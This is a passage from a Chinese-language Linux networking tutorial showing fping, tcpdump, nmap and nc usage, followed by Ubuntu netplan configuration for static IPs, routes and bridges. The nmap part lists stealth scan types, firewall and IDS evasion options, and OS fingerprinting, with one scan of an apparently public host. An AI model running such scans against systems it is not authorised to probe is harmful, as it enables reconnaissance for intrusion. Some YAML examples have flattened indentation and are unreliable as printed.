ICMP Host Unreachable from 10.0.0.8 for ICMP Echo sent to 10.0.0.5
ICMP Host Unreachable from 10.0.0.8 for ICMP Echo sent to 10.0.0.10
ICMP Host Unreachable from 10.0.0.8 for ICMP Echo sent to 10.0.0.10
ICMP Host Unreachable from 10.0.0.8 for ICMP Echo sent to 10.0.0.10
ICMP Host Unreachable from 10.0.0.8 for ICMP Echo sent to 10.0.0.10
ICMP Host Unreachable from 10.0.0.8 for ICMP Echo sent to 10.0.0.9
ICMP Host Unreachable from 10.0.0.8 for ICMP Echo sent to 10.0.0.9
ICMP Host Unreachable from 10.0.0.8 for ICMP Echo sent to 10.0.0.9
ICMP Host Unreachable from 10.0.0.8 for ICMP Echo sent to 10.0.0.9
10.0.0.5 is unreachable
10.0.0.6 is unreachable
10.0.0.7 is unreachable
10.0.0.9 is unreachable
10.0.0.10 is unreachable
 
 
#对文件中的主机时行测试
[root@centos8 ~]#tee hosts.txt <<EOF
10.0.0.7
10.0.0.6
EOF
 
10.0.0.7
10.0.0.6
 
[root@centos8 ~]#fping < hosts.txt
10.0.0.6 is alive
10.0.0.7 is unreachable
[root@centos8 ~]#fping -s < hosts.txt
10.0.0.6 is alive
10.0.0.7 is unreachable
2 targets
   1 alive
   1 unreachable
   0 unknown addresses
   1 timeouts (waiting for response)
   5 ICMP Echos sent
   1 ICMP Echo Replies received
   0 other ICMP received
0.07 ms (min round trip time)
0.07 ms (avg round trip time)
0.07 ms (max round trip time)
    4.080 sec (elapsed real time)

4.9.2 tcpdump

网络数据包截获分析工具。支持针对网络层、协议、主机、网络或端口的过滤。并提供and、or、not等逻辑语句帮助去除无用的信息。


#tcpdump [-adeflnNOpqStvx][-c<数据包数目>][-dd][-ddd][-F<表达文件>][-i<网络界面>][-r<
数据包文件>][-s<数据包大小>][-tt][-T<数据包类型>][-vv][-w<数据包文件>][输出数据栏位]
 
#参数说明：
-a     尝试将网络和广播地址转换成名称。
-c    <数据包数目> 收到指定的数据包数目后，就停止进行倾倒操作。
-d     把编译过的数据包编码转换成可阅读的格式，并倾倒到标准输出。
-dd     把编译过的数据包编码转换成C语言的格式，并倾倒到标准输出。
-ddd     把编译过的数据包编码转换成十进制数字的格式，并倾倒到标准输出。
-e     显示链路层信息,默认不显示链路层
-f     用数字显示网际网络地址。
-F    <表达文件> 指定内含表达方式的文件。
-i    <网络接口> 使用指定的网络截面送出数据包。
-l     使用标准输出列的缓冲区。
-n     不把主机的网络地址转换成名字。
-N     不列出域名。
-O     不将数据包编码最佳化。
-p     不让网络界面进入混杂模式。
-q     快速输出，仅列出少数的传输协议信息。
-r    <数据包文件> 从指定的文件读取数据包数据。
-s    <数据包大小> 设置每个数据包的大小。默认只截取前96个字节,使用-s0可以截取所有报文内容
-S     用绝对而非相对数值列出TCP关联数。
-t     在每列倾倒资料上不显示时间戳记。
-tt     在每列倾倒资料上显示未经格式化的时间戳记。
-T    <数据包类型> 强制将表达方式所指定的数据包转译成设置的数据包类型。
-v     详细显示指令执行过程。
-vv     更详细显示指令执行过程。
-x     用十六进制字码列出数据包资料。
-w    <数据包文件> 把数据包数据写入指定的文件。
 
 
#例：
#查看网卡
[root@centos8 ~]#tcpdump -D
1.eth0 [Up, Running]
2.lo [Up, Running, Loopback]
3.any (Pseudo-device that captures on all interfaces) [Up, Running]
4.bluetooth-monitor (Bluetooth Linux Monitor) [none]
5.nflog (Linux netfilter log (NFLOG) interface) [none]
6.nfqueue (Linux netfilter queue (NFQUEUE) interface) [none]
7.usbmon0 (All USB buses) [none]
8.usbmon1 (USB bus number 1)
9.usbmon2 (USB bus number 2)
 
 
##不指定任何参数，监听第一块网卡上经过的数据包。主机上可能有不止一块网卡，所以经常需要指定网卡。
tcpdump
 
#监听特定网卡
tcpdump -i en0
 
#监听特定主机，监听主机10.0.0.100 的通信包，注意：出、入的包都会被监听。
tcpdump host 10.0.0.100
 
#特定来源、目标地址的通信
#特定来源
tcpdump src host hostname
 
#特定目标地址
tcpdump dst host hostname
 
#如果不指定src跟dst，那么来源或者目标是hostname的通信都会被监听
tcpdump host hostname
 
 
 
#例：重点
[root@centos8 ~]#tcpdump -i eth0 -nn icmp and  src host 10.0.0.6 and dst host
10.0.0.7
 
#特定端口
tcpdump port 3000
 
#监听TCP/UDP，服务器上不同服务分别用了TCP、UDP作为传输层，假如只想监听TCP的数据包
tcpdump tcp
 
#来源主机+端口+TCP，监听来自主机10.0.0.100在端口22上的TCP数据包
tcpdump tcp port 22 and src host 10.0.0.100
 
#监听特定主机之间的通信
tcpdump ip host 10.0.0.101 and 10.0.0.102
 
#10.0.0.101和除了10.0.0.1之外的主机之间的通信
tcpdump ip host 10.0.0.101 and ! 10.0.0.1
 
#详细示例
tcpdump tcp -i eth1 -t -s 0 -c 100 and dst port ! 22 and src net 192.168.1.0/24
-w ./target.cap
 
(1)tcp: ip icmp arp rarp 和 tcp、udp、icmp这些选项等都要放到第一个参数的位置，用来过滤数据
报的类型
(2)-i eth1 : 只抓经过接口eth1的包
(3)-t : 不显示时间戳
(4)-s 0 :设置为0表示使用默认值262144字节抓取每个包，以便与tcpdump的旧版本兼容
(5)-c 100 : 只抓取100个数据包
(6)dst port ! 22 : 不抓取目标端口是22的数据包
(7)src net 192.168.1.0/24 : 数据包的源网络地址为192.168.1.0/24
(8)-w ./target.cap : 保存成cap文件，方便用wireshark分析
 
 
#限制抓包的数量，如下，抓到1000个包后，自动退出
tcpdump -c 1000
 
#保存到本地，tcpdump默认会将输出写到缓冲区，只有缓冲区内容达到一定的大小，或者tcpdump退出时，
才会将输出写到本地磁盘,可以加上-U强制立即写到本地磁盘（一般不建议，性能相对较差）
tcpdump -n -vvv -c 1000 -w /tmp/tcpdump_save.cap

4.9.3 nmap

扫描远程主机工具，比发送 ICMP 报文的 ping 命令的功能要强大很多

官方帮助：https://nmap.org/book/man.html


#格式：
nmap [Scan Type(s)] [Options] {target specification}
 
 
#选项：
-sT  TCP connect() 扫描，这是最基本的 TCP 扫描方式。这种扫描很容易被检测到，在目标主机的日
志中会记录大批的连接请求以及错误信息  
 
-sS  TCP 同步扫描 (TCP SYN)，因为不必全部打开一个 TCP 连接，所以这项技术通常称为半开扫描
(half-open)。这项技术最大的好处是，很少有系统能够把这记入系统日志 
 
-sF,-sX,-sN   秘密 FIN 数据包扫描、圣诞树 (Xmas Tree)、空 (Null) 扫描模式。这些扫描方式
的理论依据是：关闭的端口需要对你的探测包回应 RST 包，而打开的端口必需忽略有问题的包  
 
-sP   ping 扫描，用 ping 方式检查网络上哪些主机正在运行。当主机阻塞 ICMP echo 请求包是
ping 扫描是无效的。nmap 在任何情况下都会进行 ping 扫描，只有目标主机处于运行状态，才会进行后续
的扫描  
 
-sU  UDP 的数据包进行扫描，想知道在某台主机上提供哪些 UDP 服务，可以使用此选项  
 
-sA  ACK 扫描，这项高级的扫描方法通常可以用来穿过防火墙。  
 
-sW   滑动窗口扫描，非常类似于 ACK 的扫描  
 
-sR  RPC 扫描，和其它不同的端口扫描方法结合使用。  
 
-b   FTP 反弹攻击 (bounce attack)，连接到防火墙后面的一台 FTP 服务器做代理，接着进行端口
扫描。
 
-P0   在扫描之前，不 ping 主机。  
 
-PT   扫描之前，使用 TCP ping 确定哪些主机正在运行  
 
-PS   对于 root 用户，这个选项让 nmap 使用 SYN 包而不是 ACK 包来对目标主机进行扫描。  
 
-PI   设置这个选项，让 nmap 使用真正的 ping(ICMP echo 请求）来扫描目标主机是否正在运行。 
 
-PB   这是默认的 ping 扫描选项。它使用 ACK(-PT) 和 ICMP(-PI) 两种扫描类型并行扫描。如果防
火墙能够过滤其中一种包，使用这种方法，你就能够穿过防火墙。  
 
-O   这个选项激活对 TCP/IP 指纹特征 (fingerprinting) 的扫描，获得远程主机的标志，也就是操
作系统类型
 
-I   打开 nmap 的反向标志扫描功能。  
 
-f   使用碎片 IP 数据包发送 SYN、FIN、XMAS、NULL。包增加包过滤、入侵检测系统的难度，使其无
法知道你的企图  
 
-v   冗余模式。强烈推荐使用这个选项，它会给出扫描过程中的详细信息。
 
-S <IP>   在一些情况下，nmap 可能无法确定你的源地址 。在这种情况使用这个选项给出指定 IP 地址
 
-g port   设置扫描的源端口
 
-oN   把扫描结果重定向到一个可读的文件 logfilename 中 
 
-oS   扫描结果输出到标准输出。  
 
--host_timeout   设置扫描一台主机的时间，以毫秒为单位。默认的情况下，没有超时限制  
 
--max_rtt_timeout   设置对每次探测的等待时间，以毫秒为单位。如果超过这个时间限制就重传或者超
时。默认值是大约 9000 毫秒  
 
--min_rtt_timeout   设置 nmap 对每次探测至少等待你指定的时间，以毫秒为单位  
 
-M count   置进行 TCP connect() 扫描时，最多使用多少个套接字进行并行的扫描
 
 
#例：
#Tcp ack 扫描，并发2000，速度快
nmap -n -PA --min-parallelism 2000 172.16.0.0/16 
 
 
#仅列出指定网段上的每台主机,不发送任何报文到目标主机.
[root@centos8 ~]#nmap -sL 10.0.0.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-23 12:28 CST
Nmap scan report for 10.0.0.0
Nmap scan report for 10.0.0.1
......
Nmap scan report for 10.0.0.254
Nmap scan report for 10.0.0.255
Nmap done: 256 IP addresses (0 hosts up) scanned in 1.04 seconds
 
 
 
#可以指定一个IP地址范围
[root@centos8 ~]#nmap -sP 10.0.0.1-10
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-23 12:30 CST
Nmap scan report for 10.0.0.1
Host is up (0.000081s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.0.0.2
Host is up (0.00034s latency).
MAC Address: 00:50:56:F0:1E:25 (VMware)
Nmap scan report for 10.0.0.6
Host is up (0.00031s latency).
MAC Address: 00:0C:29:4D:EF:2C (VMware)
Nmap scan report for 10.0.0.7
Host is up (0.00036s latency).
MAC Address: 00:0C:29:29:F9:26 (VMware)
Nmap scan report for 10.0.0.8
Host is up.
Nmap done: 10 IP addresses (5 hosts up) scanned in 2.89 seconds
 
 
 
#批量扫描一个网段的主机存活数
nmap -sP -v 192.168.1.0/24
nmap –v –sn ip/24
 
#有些主机关闭了ping检测,所以可以使用-P0跳过ping的探测,可以加快扫描速度.
nmap -P0 192.168.1.100
 
#扫描主机
nmap –v –A IP 
 
#一次性扫描多台目标主机
[root@centos8 ~]#nmap 10.0.0.6 10.0.0.7
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-23 12:39 CST
Nmap scan report for 10.0.0.6
Host is up (0.00055s latency).
Not shown: 998 closed ports
PORT  STATE SERVICE
22/tcp open  ssh
111/tcp open rpcbind
MAC Address: 00:0C:29:4D:EF:2C (VMware)
Nmap scan report for 10.0.0.7
Host is up (0.00050s latency).
Not shown: 999 closed ports
PORT  STATE SERVICE
22/tcp open  ssh
MAC Address: 00:0C:29:29:F9:26 (VMware)
Nmap done: 2 IP addresses (2 hosts up) scanned in 101.01 seconds
 
 
#从一个文件中导入IP地址,并进行扫描
[root@centos8 ~]#cat hosts.txt
10.0.0.7
10.0.0.6
58.87.87.99
 
[root@centos8 ~]#nmap -iL hosts.txt
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-23 12:43 CST
Nmap scan report for 10.0.0.7
Host is up (0.0024s latency).
Not shown: 999 closed ports
PORT  STATE SERVICE
22/tcp open  ssh
MAC Address: 00:0C:29:29:F9:26 (VMware)
Nmap scan report for 10.0.0.6
Host is up (0.0032s latency).
Not shown: 998 closed ports
PORT  STATE SERVICE
22/tcp open  ssh
111/tcp open rpcbind
MAC Address: 00:0C:29:4D:EF:2C (VMware)
Nmap scan report for 58.87.87.99
Host is up (0.016s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE
80/tcp  open http
3306/tcp open mysql
Nmap done: 3 IP addresses (3 hosts up) scanned in 120.33 seconds
 
 
#探测目标主机开放的端口,可指定一个以逗号分隔的端口列表(如-PS22,443,80)
[root@centos8 ~]#nmap -PS22,80,443 10.0.0.1
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-23 12:31 CST
Nmap scan report for 10.0.0.1
Host is up (0.00042s latency).
Not shown: 996 filtered ports
PORT   STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8082/tcp open blackice-alerts
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 12.65 seconds
 
 
#使用SYN半开放扫描
[root@centos8 ~]#nmap -sS 10.0.0.1
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-23 12:33 CST
Nmap scan report for 10.0.0.1
Host is up (-0.052s latency).
Not shown: 996 filtered ports
PORT   STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8082/tcp open blackice-alerts
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 10.07 seconds
 
 
 
#扫描开放了TCP端口的设备
[root@centos8 ~]#nmap -sT 10.0.0.1
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-23 12:34 CST
Nmap scan report for 10.0.0.1
Host is up (0.00040s latency).
Not shown: 996 filtered ports
PORT   STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8082/tcp open blackice-alerts
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 4.52 seconds
 
 
#扫描开放了UDP端口的设备
[root@centos8 ~]#nmap -sU 10.0.0.1
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-23 12:34 CST
Nmap scan report for 10.0.0.1
Host is up (0.00046s latency).
Not shown: 999 open|filtered ports
PORT  STATE SERVICE
137/udp open netbios-ns
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 18.52 seconds
 
 
#只扫描UDP端口
nmap –e eth1 -sU -O 10.0.0.1 
 
#扫描TCP和UDP端口
nmap -sTU -O 10.0.0.1 
 
 
#用于扫描目标主机服务版本号
[root@centos8 ~]#nmap -sV 10.0.0.7
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-23 12:37 CST
Nmap scan report for 10.0.0.7
Host is up (0.0011s latency).
Not shown: 999 closed ports
PORT  STATE SERVICE VERSION
22/tcp open  ssh   OpenSSH 7.4 (protocol 2.0)
MAC Address: 00:0C:29:29:F9:26 (VMware)
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.97 seconds
 
 
#查看主机当前开放的端口
nmap localhost  
 
#查看主机端口（1024-65535）中开放的端口
nmap -p 1024-65535 localhost 
 
 
#探测目标主机开放的端口
nmap -PS 10.0.0.1 
 
#探测所列出的目标主机端口
nmap -PS22,80,3306 10.0.0.1 
 
#探测目标主机操作系统类型
nmap -O 10.0.0.1
 
#探测目标主机操作系统类型
nmap -A 10.0.0.1

4.9.4 nc

nc是netcat的简写，有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用，被设计为一个简单、可靠的网络工具


#nc的作用
    实现任意TCP/UDP端口的侦听，nc可以作为server以TCP或UDP方式侦听指定端口
    端口的扫描，nc可以作为client发起TCP或UDP连接
    机器之间传输文件
    机器之间网络测速
 
#格式：
nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>][-s<
来源位址>][-v...][-w<超时秒数>][主机名称][通信端口...]
 
 
#选项：
-g    <网关> 设置路由器跃程通信网关，最多可设置8个。
-G    <指向器数目> 设置来源路由指向器，其数值为4的倍数。
-h     在线帮助。
-i    <延迟秒数> 设置时间间隔，以便传送信息及扫描通信端口。
-l     使用监听模式，管控传入的资料。
-n     直接使用IP地址，而不通过域名服务器。
-o    <输出文件> 指定文件名称，把往来传输的数据以16进制字码倾倒成该文件保存。
-p    <通信端口> 设置本地主机使用的通信端口。
-r     乱数指定本地与远端主机的通信端口。
-s    <来源位址> 设置本地主机送出数据包的IP地址。
-u     使用UDP传输协议。
-v     显示指令执行过程。
-w    <超时秒数> 设置等待连线的时间。
-z     表示zero，表示扫描时不发送任何数据，只在扫描通信端口时使用。
 
 
##安装nc
[root@ubuntu1804 ~]#apt -y install netcat-openbsd
[root@centos8 ~]#yum -y install nc
 
 
#探测TCP协议
[root@ubuntu1804 ~]#nc -zv  10.0.0.101 22
Connection to 10.0.0.101 22 port [tcp/ssh] succeeded!
[root@ubuntu1804 ~]#nc -zv  10.0.0.101 2222
nc: connect to 10.0.0.101 port 2222 (tcp) failed: Connection refused
 
 
#探测UDP协议
[root@ubuntu1804 ~]#nc -zv -u 10.0.0.101 2049
Connection to 10.0.0.101 2049 port [udp/nfs] succeeded!
[root@ubuntu1804 ~]#nc -zv -u 10.0.0.101 111
Connection to 10.0.0.101 111 port [udp/sunrpc] succeeded!
[root@ubuntu1804 ~]#nc -zv -u 10.0.0.101 123

5 Ubuntu 网络配置

5.1 主机名


#修改主机名
root@ubuntu1804:~# hostnamectl set-hostname ubuntu1804.baidu.com
root@ubuntu1804:~# cat /etc/hostname
ubuntu1804.baidu.com
root@ubuntu1804:~# hostname
ubuntu1804.baidu.com
root@ubuntu1804:~# echo $HOSTNAME
ubuntu1804
root@ubuntu1804:~# exit
logout
xin@ubuntu1804:~$ sudo -i
root@ubuntu1804:~# echo $HOSTNAME
ubuntu1804.baidu.com

5.2 网卡名称

默认ubuntu的网卡名称和 CentOS 7 类似，如：ens33，ens38等


#修改网卡名称为传统命名方式：
#修改配置文件为下面形式
root@ubuntu1804:~#vi /etc/default/grub
GRUB_CMDLINE_LINUX="net.ifnames=0"
#或者sed修改
root@ubuntu1804:~# sed -i.bak '/^GRUB_CMDLINE_LINUX=/s#"$#net.ifnames=0"#'
/etc/default/grub
 
#生效新的grub.cfg文件
root@ubuntu1804:~# grub-mkconfig -o /boot/grub/grub.cfg
#或者
root@ubuntu1804:~# update-grub
root@ubuntu1804:~# grep net.ifnames /boot/grub/grub.cfg
   linux /vmlinuz-4.15.0-96-generic root=UUID=51517b88-7e2b-4d4a-8c14-
fe1a48ba153c ro net.ifnames=0
   linux /vmlinuz-4.15.0-96-generic root=UUID=51517b88-7e2b-4d4a-
8c14-fe1a48ba153c ro net.ifnames=0
   linux /vmlinuz-4.15.0-96-generic root=UUID=51517b88-7e2b-4d4a-
8c14-fe1a48ba153c ro recovery nomodeset net.ifnames=0
   linux /vmlinuz-4.15.0-76-generic root=UUID=51517b88-7e2b-4d4a-
8c14-fe1a48ba153c ro net.ifnames=0
   linux /vmlinuz-4.15.0-76-generic root=UUID=51517b88-7e2b-4d4a-
8c14-fe1a48ba153c ro recovery nomodeset net.ifnames=0
 
 
#重启生效
root@ubuntu1804:~# reboot

5.3 Ubuntu网卡配置

官网文档：
https://help.ubuntu.com/
https://ubuntu.com/server/docs/network-configuration

5.3.1 配置自动获取IP

网卡配置文件采用YAML格式,必须以 /etc/netplan/XXX.yaml 文件命名方式存放
可以每个网卡对应一个单独的配置文件,也可以将所有网卡都放在一个配置文件里


#例：
root@ubuntu1804:~# cat /etc/netplan/01-netcfg.yaml
# This file describes the network interfaces available on your system
# For more information, see netplan(5).
network:
version: 2
renderer: networkd
ethernets:
 eth0:
  dhcp4: yes
 
 
#修改网卡配置文件后需执行命令生效：
root@ubuntu1804:~#netplan apply

5.2.2 配置静态IP


#例：
root@ubuntu1804:~#vim /etc/netplan/01-netcfg.yaml
network:
  version: 2
  renderer: networkd
  ethernets:
    eth0:
      addresses: [192.168.8.10/24,10.0.0.10/8]  #或者用下面两行,两种格式不能混用
      - 192.168.8.10/24
      - 10.0.0.10/8
      gateway4: 10.0.0.2
      nameservers:
         search: [baidu.com, baidu.org]
         addresses: [180.76.76.76, 8.8.8.8, 1.1.1.1]
 
 
 
#查看ip和gateway
root@ubuntu1804:~#ip addr
root@ubuntu1804:~#route -n
 
 
#查看DNS
root@ubuntu1804:~#ls -l /etc/resolv.conf
lrwxrwxrwx 1 root root 39 Dec 12 11:36 /etc/resolv.conf ->
../run/systemd/resolve/stub-resolv.conf
 
root@ubuntu2004:~# resolvectl status #Ubuntu 20.04新命令
root@ubuntu1804:~# systemd-resolve --status
Global
    DNSSEC NTA: 10.in-addr.arpa
           16.172.in-addr.arpa
           168.192.in-addr.arpa
           17.172.in-addr.arpa
           18.172.in-addr.arpa
           19.172.in-addr.arpa
           20.172.in-addr.arpa
           21.172.in-addr.arpa
           22.172.in-addr.arpa
           23.172.in-addr.arpa
           24.172.in-addr.arpa
           25.172.in-addr.arpa
           26.172.in-addr.arpa
           27.172.in-addr.arpa
           28.172.in-addr.arpa
           29.172.in-addr.arpa
           30.172.in-addr.arpa
           31.172.in-addr.arpa
           corp
           d.f.ip6.arpa
           home
           internal
           intranet
           lan
           local
           private
           test
Link 5 (eth3)
  Current Scopes: none
   LLMNR setting: yes
MulticastDNS setting: no
  DNSSEC setting: no
 DNSSEC supported: no
Link 4 (eth2)
  Current Scopes: none
   LLMNR setting: yes
MulticastDNS setting: no
  DNSSEC setting: no
 DNSSEC supported: no
Link 3 (eth1)
  Current Scopes: DNS
   LLMNR setting: yes
MulticastDNS setting: no
  DNSSEC setting: no
 DNSSEC supported: no
    DNS Servers: 180.76.76.76
           8.8.8.8
           1.1.1.1
    DNS Domain: baidu.com
                baidu.org
 
Link 2 (eth0)
  Current Scopes: DNS
   LLMNR setting: yes
MulticastDNS setting: no
  DNSSEC setting: no
 DNSSEC supported: no
    DNS Servers: 10.0.0.2
    DNS Domain: localdomain

5.3.3 配置多⽹卡静态IP和静态路由


root@ubuntu1804:~#vim  /etc/netplan/01-netcfg.yaml
# This file describes the network interfaces available on your system
# For more information, see netplan(5).
network:
version: 2
renderer: networkd
ethernets:
 eth0:
  dhcp4: no
  dhcp6: no
  addresses: [10.0.0.100/16]
  gateway4: 10.0.0.2
  nameservers:
    addresses: [223.6.6.6]
 eth1:
  dhcp4: no
  dhcp6: no
  addresses: [10.20.0.100/16]
  routes:
   - to: 10.30.0.0/16
   via: 10.20.0.1
   - to: 10.40.0.0/16
   via: 10.20.0.1
   - to: 10.50.0.0/16
   via: 10.20.0.1
   - to: 10.60.0.0/16
   via: 10.20.0.1
 
 
root@ubuntu1804:~#netplan apply
root@ubuntu1804:~#route -n
Kernel IP routing table
Destination   Gateway     Genmask     Flags Metric Ref  Use Iface
0.0.0.0     10.0.0.2     0.0.0.0     UG   0    0     0 eth0
10.0.0.0     0.0.0.0     255.255.0.0   U   0    0     0 eth0
10.20.0.0    0.0.0.0     255.255.0.0   U   0    0     0 eth1
10.30.0.0    10.20.0.1    255.255.0.0   UG   0    0     0 eth1
10.40.0.0    10.20.0.1    255.255.0.0   UG   0    0     0 eth1
10.50.0.0    10.20.0.1    255.255.0.0   UG   0    0     0 eth1
10.60.0.0    10.20.0.1    255.255.0.0   UG   0    0     0 eth1
 
 
 
#或者每个网卡各自一个配置文件
root@ubuntu1804:/etc/netplan# ls
01-netcfg.yaml  02-eth1.yaml 
root@ubuntu1804:/etc/netplan# cat 01-netcfg.yaml
# This file describes the network interfaces available on your system
# For more information, see netplan(5).
network:
version: 2
renderer: networkd
ethernets:
 eth0:
  dhcp4: yes
  
root@ubuntu1804:/etc/netplan# cat 02-eth1.yaml
network:
version: 2
renderer: networkd
ethernets:
 eth1:
  addresses:
   - 10.20.0.100/16
   - 192.168.0.100/24
  gateway4: 10.20.0.2
  nameservers:
   search: [baidu.com, baidu.org]
   addresses: [180.76.76.76, 8.8.8.8, 1.1.1.1]
  routes:
   - to: 10.30.0.0/16
   via: 10.20.0.1
   - to: 10.40.0.0/16
   via: 10.20.0.1
   - to: 10.50.0.0/16
   via: 10.20.0.1
   - to: 10.60.0.0/16
   via: 10.20.0.1

5.3.4 单组桥接


root@ubuntu1804:~# apt install -y bridge-utils
root@ubuntu1804:~# dpkg -L bridge-utils
/sbin/brctl
......
 
#三个网卡配置使用一个配置文件
root@ubuntu1804:~# cat /etc/netplan/01-netcfg.yaml
# This file describes the network interfaces available on your system
# For more information, see netplan(5).
network:
version: 2
renderer: networkd
ethernets:
 eth0:
  dhcp4: yes
 eth1:
  dhcp4: no
  dhcp6: no
 eth2:
  dhcp4: no  
bridges:
 br0:
  dhcp4: no
  dhcp6: no
  addresses: [10.0.0.18/16]
  gateway4: 10.0.0.2
  nameservers:
   addresses: [223.6.6.6]
  interfaces:
   - eth1
   - eth2
 
 
#桥接配置单独一个文件
[root@ubuntu1804 netplan]#cat br0.yaml
network:
version: 2
renderer: networkd
ethernets:
 eth1:
  dhcp4: no
  dhcp6: no
 eth2:
  dhcp4: no  
bridges:
 br0:
  dhcp4: no
  dhcp6: no
  addresses: [10.0.0.10/16]
  gateway4: 10.0.0.2
  nameservers:
   addresses: [223.6.6.6]
  interfaces:
   - eth1
   - eth2
 
 
root@ubuntu1804:~# netplan apply
root@ubuntu1804:~# ifconfig br0
br0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
   inet 10.0.0.18 netmask 255.255.0.0 broadcast 10.0.255.255
   inet6 fe80::9cbe:1dff:fe85:6601 prefixlen 64 scopeid 0x20<link>
   ether 9e:be:1d:85:66:01 txqueuelen 1000 (Ethernet)
   RX packets 158 bytes 19534 (19.5 KB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 10 bytes 796 (796.0 B)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
 
root@ubuntu1804:~# brctl show
bridge name bridge id STP enabled interfaces
br0 8000.9ebe1d856601 no eth1
                         eth2

5.3.5 多组桥接


root@ubuntu1804:~#vim  /etc/netplan/01-netcfg.yaml
# This file describes the network interfaces available on your system
# For more information, see netplan(5).
network:
version: 2
renderer: networkd
ethernets:
 eth0:
  dhcp4: no
  dhcp6: no
 eth1:
  dhcp4: no
  dhcp6: no
bridges:
 br0:
  dhcp4: no
  dhcp6: no
  addresses: [10.0.0.18/16]
  gateway4: 10.0.0.1
  nameservers:
   addresses: [223.6.6.6]
  interfaces:
   - eth0
 br1:
  dhcp4: no
  dhcp6: no
  addresses: [10.10.0.18/16]
  routes:
   - to: 10.20.0.0/16
    via: 10.10.0.1
   - to: 10.30.0.0/16
    via: 10.10.0.1
   - to: 10.40.0.0/16
    via: 10.10.0.1
   - to: 10.50.0.0/16
    via: 10.10.0.1
  interfaces:
   - eth1
 
 
root@ubuntu1804:~# brctl show
bridge name bridge id STP enabled interfaces
br0 8000.96dbd15c1daf no eth0
br1 8000.9e02ab0faeb0 no eth1
root@ubuntu1804:~# ifconfig br0
br0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
   inet 10.0.0.18 netmask 255.255.0.0 broadcast 10.0.255.255
   inet6 fe80::94db:d1ff:fe5c:1daf prefixlen 64 scopeid 0x20<link>
   ether 96:db:d1:5c:1d:af txqueuelen 1000 (Ethernet)
   RX packets 790 bytes 58296 (58.2 KB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 608 bytes 81652 (81.6 KB)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
 
root@ubuntu1804:~# ifconfig br1
br1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
   inet 10.10.0.18 netmask 255.255.0.0 broadcast 10.10.255.255
   inet6 fe80::9c02:abff:fe0f:aeb0 prefixlen 64 scopeid 0x20<link>
   ether 9e:02:ab:0f:ae:b0 txqueuelen 1000 (Ethernet)
   RX packets 10 bytes 1046 (1.0 KB)
   RX errors 0 dropped 0 overruns 0 frame 0
   TX packets 7 bytes 586 (586.0 B)
   TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
 
 
root@ubuntu1804:~# route -n
Kernel IP routing table
Destination   Gateway     Genmask     Flags Metric Ref  Use Iface
0.0.0.0     10.0.0.1     0.0.0.0     UG   0    0     0 br0
10.0.0.0     0.0.0.0     255.255.0.0   U   0    0     0 br0
10.10.0.0    0.0.0.0     255.255.0.0   U   0    0     0 br1
10.20.0.0    10.10.0.1    255.255.0.0   UG   0    0     0 br1
10.30.0.0    10.10.0.1    255.255.0.0   UG   0    0     0 br1
10.50.0.0    10.10.0.1    255.255.0.0   UG   0    0     0 br1

5.3.6 双⽹卡绑定


#支持多网卡绑定七种模式
#第一种模式：mod=0，即：(balance-rr) Round-robin policy（平衡抡循环策略）
特点：传输数据包顺序是依次传输（即：第1个包走eth0，下一个包就走eth1...一直循环下去，直到最后一
个传输完毕），此模式提供负载平衡和容错能力。
 
#第二种模式：mod=1，即： (active-backup) Active-backup policy（主-备份策略）
特点：只有一个设备处于活动状态，当一个宕掉另一个马上由备份转换为主设备。mac地址是外部可见得，从
外面看来，bond的MAC地址是唯一的，以避免switch(交换机)发生混乱。此模式只提供了容错能力；由此可
见此算法的优点是可以提供网络连接的可用性，但是它的资源利用率较低，只有一个接口处于工作状态，在有
N 个网络接⼝的情况下，资源利用率为1/N。
 
#第三种模式：mod=2，即：(balance-xor) XOR policy（平衡策略）
特点：基于指定的传输HASH策略传输数据包。缺省的策略是：(源MAC地址 XOR 目标MAC地址) % slave数
量。其他的传输策略可以通过xmit_hash_policy选项指定，此模式提供负载平衡和容错能力。
 
#第四种模式：mod=3，即：broadcast（广播策略）
特点：在每个slave接口上传输每个数据包，此模式提供了容错能力。
 
#第五种模式：mod=4，即：(802.3ad) IEEE 802.3ad Dynamic link aggregation（IEEE 802.3ad
动态链接聚合）
特点：创建一个聚合组，它们共享同样的速率和双工设定。根据802.3ad规范将多个slave工作在同一个激活
的聚合体下。
必要条件：
    条件1：ethtool持获取每个slave的速率和双工设定。
    条件2：switch(交换机)支持IEEE 802.3ad Dynamic link aggregation。
    条件3：多数switch(交换机)需要经过特定配置才能支持802.3ad模式。
 
#第六种模式：mod=5，即：(balance-tlb) Adaptive transmit load balancing（适配器传输负载均
衡）
